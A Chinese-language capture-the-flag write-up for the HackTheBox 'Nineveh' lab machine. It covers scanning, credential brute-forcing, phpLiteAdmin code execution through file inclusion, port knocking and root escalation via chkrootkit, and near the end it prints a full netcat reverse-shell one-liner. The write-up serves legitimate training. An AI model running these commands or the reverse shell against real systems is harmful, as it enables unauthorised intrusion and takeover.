信息收集：

nmap -p- -sT --min-rate=10000 -Pn 10.129.26.243

nmap -p- -sU --min-rate=10000 -Pn 10.129.26.243

nmap -p80,443 -sT -sV -sC -O -Pn 10.129.26.243

發現域名nineveh.htb加入hosts文件中，因為只有80,443端口開放訪問，只好從web端入手了

將圖片下載后，分析了一下沒有其他信息與隱寫

?

?

沒有什么漏洞點，就先爆破子域名與目錄掃描

利用dirsearch目錄掃描http://nineveh.htb ，發現了info.php這個文件，訪問后發現其實是phpinfo

?dirsearch掃描https://nineveh.htb后發現了/db/目錄

?訪問后發現是phpliteadmin v1.9的登陸界面，利用searchsploit搜索歷史漏洞

目前只知道是v1.9版本，具體的版本號不清楚，都嘗試一下，嘗試后發現，漏洞都是需要先進入后臺才能觸發的，依舊沒有什么思路的收獲，只好再嘗試目錄掃描，看看有沒有什么遺漏的目錄

利用feroxbuster掃描出了一個新的目錄

?訪問后發現是一個新的登陸界面

?查看一下源代碼，似乎存在admin賬戶，并且可能跟數據庫有關

目前沒有其他的信息了，只能采用最簡單的方式，利用hydra進行密碼爆破

?成功爆破出密碼

登陸后發現沒有什么可以利用的信息

繼續嘗試爆破phpliteadmin的密碼

成功爆破出密碼password123

?利用爆出的密碼登陸后臺

?之前searchsploit發現了一個遠程代碼執行漏洞

成功寫入shell,但是現在又發現了另一個困難，寫入了shell，此時需要一個文件包含的接口，否則我無法利用寫入的shell，這里有shell的絕對路徑/var/tmp/shell.php?

?

找了好久之后，在第一次進入的管理后臺發現了文件包含的接口

成功包含了shell.php,反彈shell成功，成功拿到立足點

?

?在/var/www/ssl/secure_notes下發現了一個圖片，遠程加載下來

?在圖片里發現了隱寫的內容有ssh 的私鑰與公鑰，但是在之前掃描端口時，并沒有發現22端口開放

?查看了一下配置文件 /etc/knockd.conf，發現需要在5s內訪問571,290,911才能開啟22端口

依次訪問571,290,911

?

?利用密匙成功連接ssh

?通過查看權限發現report目錄，對應當前用戶的權限

?仔細檢查了一下內容，這個似乎是可以檢查rootkit后門

檢查了一下正常運行的程序，發現chkrootkit正在運行中

?chkrootkit存在本地提權漏洞，將文件寫入后，當chkrootkit掃描到會以root權限去嘗試運行

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.20 4455 >/tmp/f" > update

過一會兒后，成功接收到root權限的反彈shell

?

?

?

?

總結

以上是生活随笔為你收集整理的HTB打靶日记：Nineveh的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。